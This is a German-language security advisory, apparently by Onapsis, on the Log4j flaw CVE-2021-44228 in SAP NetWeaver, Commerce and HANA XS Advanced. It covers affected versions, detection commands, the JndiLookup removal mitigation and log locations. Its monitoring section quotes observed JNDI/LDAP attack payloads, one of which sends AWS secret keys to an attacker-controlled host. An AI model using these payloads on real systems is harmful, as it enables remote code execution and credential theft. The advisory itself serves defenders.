Hinweis: Bitte beachten Sie, dass sich alle hier bereitgestellten Informationen ändern können, da immer wieder neue Angriffe und Umgehungsmöglichkeiten für die vorgeschlagenen Abhilfemaßnahmen entdeckt werden.
Die Informationen auf dieser Seite wurden zuletzt am 27. Dezember 2021 um 10:00 Uhr EST aktualisiert.
AKTUELLES 27.12.2021:
- Enthaltene SAP-Sicherheitshinweise für SAP HANA XSA zu CVE-2021-45046 und CVE-2021-45046
AKTUELLES 17.12.2021:
- Enthaltener SAP-Sicherheitshinweis für SAP PI
- Enthaltener SAP-Central-Hinweis zu CVE-2021-44228 (#3131047)
- Neue Informationen zu SAP HANA XS Advanced Applications hinzugefügt
Einleitung
Am 9. Dezember wurde eine kritische Sicherheitslücke (CVE-2021-44228) in einer weit verbreiteten Java-Logging-Bibliothek namens Log4j bekannt gegeben. Diese Sicherheitslücke ermöglicht es nicht authentifizierten Angreifern, auf sehr einfache Weise Befehle auf betroffenen Systemen auszuführen. Die Auswirkungen dieser Schwachstelle sind enorm, da Tausende von Produkten sie nutzen, darunter auch SAP-Anwendungen. Onapsis Research Labs daran gearbeitet, die Auswirkungen dieser Schwachstelle auf einige der am häufigsten verwendeten SAP-Produkte zu untersuchen.
Dieser Hinweis soll Sicherheitsverantwortlichen dabei helfen, besser assess Systeme in der Infrastruktur dringend Aufmerksamkeit erfordern, welche Ausweichlösungen zur Verfügung stehen und wo sie weitere Informationen finden können, falls sie mehr Details benötigen.
Betroffene Produkte
In diesem Abschnitt finden Sie detaillierte Informationen zur Analyse von Onapsis bezüglich CVE-2021-44228 für SAP NetWeaver ABAP-, SAP NetWeaver Java-, SAP Commerce- und SAP HANA XS Advanced-Anwendungen. Außerdem werden Verweise auf weitere SAP-Produkte bereitgestellt.
SAP NetWeaver ABAP
SAP NetWeaver ABAP ist von diesem Problem nicht betroffen.
SAP NetWeaver Java-
Die Erkenntnisse von Onapsis zu SAP NetWeaver Java stimmen mit der von SAP veröffentlichten Analyse in der SAP-Sicherheitsmitteilung Nr. 3129883 überein. Eine Standardinstallation von NetWeaver Java ist nicht anfällig für CVE-2021-44228, da sie die betroffene Bibliothek nicht verwendet. Kunden können jedoch auf Basis von NetWeaver Java eigene Anwendungen entwickeln und bereitstellen, die möglicherweise eine anfällige Version von log4j verwenden. Für solche Fälle hat SAP eine Methode veröffentlicht, mit der überprüft werden kann, ob bereitgestellte Anwendungen die betroffene Bibliothek verwenden, sowie eine Abhilfe, um die zur Ausnutzung der Schwachstelle verwendete Funktionalität zu deaktivieren.
So überprüfen Sie, ob eine Anwendung eine potenziell anfällige log4j-Bibliothek verwendet
- Melden Sie sich per SSH beim SAP-AS-Java-System an
- Connect via Telnet to the SAP AS Java, and execute the following command:
telnet localhost <5XX08> (where xx is the instance number) - Führen Sie die folgenden Befehle nacheinander aus:
-
llr -all -f org/apache/log4j/Logger.class
-
llr -all -f org/apache/logging/log4j/core/Logger.class
-
llr -all -f org/apache/logging/log4j/Logger.class
-
llr -all -f org/apache/naming/factory/BeanFactory.class
-
- Wenn die Ausgabe aller oben genannten Befehle lautet: „Diese Ressource ist in den registrierten Ladern nicht zu finden!“, ist Ihr System nicht betroffen. In allen anderen Fällen wird in der Ausgabe eine Anwendung angezeigt. Um festzustellen, welche Version der Bibliothek verwendet wird, ist eine weitere Analyse gemeinsam mit dem Verantwortlichen für die Anwendung erforderlich.
Implementierung der Abhilfe in SAP AS Java
Die ursprüngliche Anweisung, den Parameter „log4j2.formatMsgNoLookups“ mit dem Wert „true“ zu setzen, wurde inzwischen von Apache widerlegt (https://logging.apache.org/log4j/2.x/security.html). Stattdessen wird denjenigen, die die neue Version der Bibliothek nicht einsetzen können, empfohlen, die Klasse „JndiLookup“ mithilfe des folgenden Vorgehens aus dem Klassenpfad zu entfernen:
- Um festzustellen, wo sich potenziell anfällige Bibliotheken befinden, können Sie den folgenden Befehl verwenden:
find / -name „log4j-core-*“
Dieser Befehl zeigt alle im System vorhandenen log4j-Kernbibliotheken an. Sie müssen überprüfen, welche dieser Bibliotheken von der Anwendung verwendet werden, die Sie schützen möchten.
- Führen Sie für jedes zurückgegebene Ergebnis den folgenden Befehl aus:
zip -q -d /<path_to_library>/log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Hinweis: Bevor Sie diese Problemumgehung implementieren, sollten Sie deren mögliche Auswirkungen auf Entwicklungssysteme prüfen, da dadurch Funktionen deaktiviert werden, die Ihre Anwendungen möglicherweise benötigen.
Sollten Sie weitere Informationen zu diesem Szenario benötigen, lesen Sie bitte den SAP-Sicherheitshinweis Nr. 3129883 – CVE-2021-44228 – Auswirkungen der Log4j-Sicherheitslücke auf AS Java Core Components (Anmeldung erforderlich).
Ein Hinweis zur SAP-Prozessorchestrierung
SAP hat einen speziellen Sicherheitshinweis (Nr. 3131215) für SAP Process Orchestration veröffentlicht, eine auf SAP AS Java basierende Lösung, die möglicherweise betroffen ist. Die oben beschriebene Abhilfe verhindert die Ausnutzung der Sicherheitslücke. Weitere Informationen finden Sie im SAP-Sicherheitshinweis.
UPDATE-
: SAP hat den SAP-Sicherheitshinweis Nr. 3130521 veröffentlicht, der Aktualisierungen und zusätzliche Hinweise für SAP Process Integration (SAP PI) enthält. Es wird empfohlen, diesen Hinweis zu lesen, wenn Sie ein betroffenes System in Ihrer Landschaft haben.
SAP Commerce (Hybris)
SAP hat drei Sicherheitshinweise veröffentlicht, die sich mit CVE-2021-44228 für SAP Commerce in verschiedenen Szenarien befassen:
- SAP Commerce OnPremise, SAP-Sicherheitshinweis Nr. 3130967
- SAP Commerce Cloud Public Cloud), SAP-Sicherheitshinweis Nr. 3130939
- SAP Commerce Cloud SAP Cloud), SAP-Sicherheitshinweis Nr. 3130982
Auf anfällige Versionen prüfen
SAP Commerce versions <= 1905 use a vulnerable version of the library. To check what version of the platform is running, you can perform the following steps:
- Bei der Verwaltungskonsole anmelden
- Gehe zu: Platform > Konfiguration
- Suche nach „build.version“
Sollten Sie feststellen, dass die bei Ihnen verwendete Version betroffen ist, lesen Sie bitte den für Ihr Szenario relevanten SAP-Sicherheitshinweis, um weitere Anweisungen zur Behebung des Problems zu erhalten.
SAP-HANA-XS-Advanced-Anwendungen
UPDATE 27.12.
SAP hat den SAP-Sicherheitshinweis Nr. 3134531 veröffentlicht, der sich mit den Sicherheitslücken CVE-2021-45046 und CVE-2021-45046 befasst. Dieser Hinweis ersetzt die SAP-Sicherheitshinweise Nr. 3131397 und Nr. 3132822.
UPDATE
SAP hat den SAP-Sicherheitshinweis Nr. 3131258 veröffentlicht, der Updates für SAP-HANA-XS-Advanced-Anwendungen enthält, die von CVE-2021-44228 betroffen sind. Es wird dringend empfohlen, betroffene Anwendungen auf die neueste Version zu aktualisieren.
Nach einer ersten Analyse Onapsis Research Labs , dass bestimmte Versionen von SAP HANA XS Advanced Anwendungen enthalten, die von diesem Problem betroffen sein könnten. SAP hat den SAP-Sicherheitshinweis Nr. 3130698 veröffentlicht, in dem angegeben wird, dass XS Advanced Runtime-Versionen unterhalb von 1.0.140 (einschließlich 1.0.140) betroffen sind.
Anwendung der Abhilfemaßnahme
Bis SAP einen Patch veröffentlicht, lässt sich diese Sicherheitslücke durch die Anwendung einer Abhilfemaßnahme mindern. Die ursprüngliche Abhilfemaßnahme, bei der der Parameter „-Dlog4j2.formatMsgNoLookups“ auf „true“ gesetzt wurde (weitere Einzelheiten finden Sie im SAP-Hinweis), scheint laut Apache unzureichend zu sein. Die empfohlene Abhilfemaßnahme besteht darin, die Klasse „JndiLookup“ anhand der folgenden Schritte zu entfernen:
- Suchen Sie nach log4j-JAR-Dateien mit:
find / -name „log4j-core-*“
- For every log4j library file <2.10 remove JndiLookup.class with:
zip -q -d log4j-core-<version>.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Weitere SAP-Produkte
UPDATE-
: SAP hat den SAP-Hinweis Nr. 3131047 veröffentlicht, um alle Informationen zu den betroffenen Produkten und Abhilfemaßnahmen für CVE-2021-44228 an einem Ort zusammenzufassen.
SAP prüft derzeit, inwieweit diese Sicherheitslücke auch andere Produkte betrifft. Wenn Sie Informationen zu einem konkreten Fall benötigen, lesen Sie bitte die Stellungnahme von SAP für Kunden zur Log4j-Sicherheitslücke.
Überwachung von SAP-Systemen hinsichtlich CVE-2021-44228
Obwohl den Onapsis Research Labs keine öffentlich bekannten Exploits bekannt Onapsis Research Labs , die speziell auf SAP-Produkte abzielen, suchen bereits zahlreiche Bots und kompromittierte Rechner massenhaft nach Systemen, die für diese Sicherheitslücke anfällig sind. Es wird empfohlen, die folgenden Protokolle auf verdächtige Aktivitäten zu überwachen.
Die folgenden Informationen können Ihnen als Ausgangspunkt für Ihre Analyse dienen. Bitte beachten Sie, dass angesichts der hohen Anzahl automatisierter Angriffe, die wir beobachtet haben, die Wahrscheinlichkeit hoch ist, dass Sie einen oder mehrere der unten aufgeführten Indikatoren finden. Dies bedeutet jedoch nicht automatisch, dass ein Angriff erfolgreich war. Es ist eine gründlichere Analyse erforderlich als eine einfache Übereinstimmung in einem Protokoll.
Angriffsmuster
Die folgenden Payloads wurden in URLs, User-Agents und anderen HTTP-Headern verwendet:
- ${jndi:ldap://<host>:<port>/Basic/Command/Base64/<base64string>}
- ${jndi:ldap://${env:AWS_ACCESS_KEY_ID:-x}.$}env:AWS_SECRET_ACCESS_KEY:-x}
Beachten Sie, dass bereits Alternativen zu diesen Payloads im Einsatz sind, die den Schutz von Web-Application-Firewalls umgehen.
SAP NetWeaver AS Java
The “responses” log file will log (by default) any exploitation attempt that includes the payload as a URL. You can find it under directory: <nw_installation_dir>/<SID>/J<NR>/j2ee/cluster/server0/log/system/httpaccess/responses*.trc
SAP Commerce
All the platform’s access logs are stored under the directory <hybris_installation_dir>/hybris/log/tomcat. Inside these files, which are organized by day, will log useful data that may allow the detection of exploitation attempts.
SAP HANA XS – Erweiterte Anwendungen
Wie bereits erläutert, wird jeder Angriffsversuch, bei dem die Nutzlast Teil der URL ist, in einem Zugriffsprotokoll erfasst. Alle Zugriffsprotokolle, die Teil der XSA sind – von Hauptkomponenten wie UAA und Controller bis hin zu den einzelnen Anwendungsteilen der platform – werden dort gespeichert:
<hana_installation_dir>/<SID>/controller_data/controller/router/webdispatcher/logs/